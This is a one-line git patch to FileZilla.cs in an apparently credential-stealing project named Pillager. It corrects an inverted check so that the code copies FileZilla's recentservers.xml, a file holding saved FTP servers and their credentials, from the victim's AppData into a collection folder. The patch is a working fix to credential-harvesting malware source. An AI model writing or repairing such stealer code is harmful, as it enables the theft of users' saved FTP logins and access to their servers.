From d41cca2305b918c563af0ff1aa53048627a6b582 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=B0=9E=E7=B4=94?= <287182701@qq.com> Date: Thu, 28 Dec 2023 23:58:25 +0800 Subject: [PATCH] Update FileZilla.cs --- Pillager/FTP/FileZilla.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Pillager/FTP/FileZilla.cs b/Pillager/FTP/FileZilla.cs index 39971f7..d355ff6 100644 --- a/Pillager/FTP/FileZilla.cs +++ b/Pillager/FTP/FileZilla.cs @@ -15,7 +15,7 @@ namespace Pillager.FTP try { string xmlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"FileZilla\recentservers.xml"); - if (!File.Exists(xmlpath)) + if (File.Exists(xmlpath)) { string savepath = Path.Combine(path, FTPName); Directory.CreateDirectory(savepath);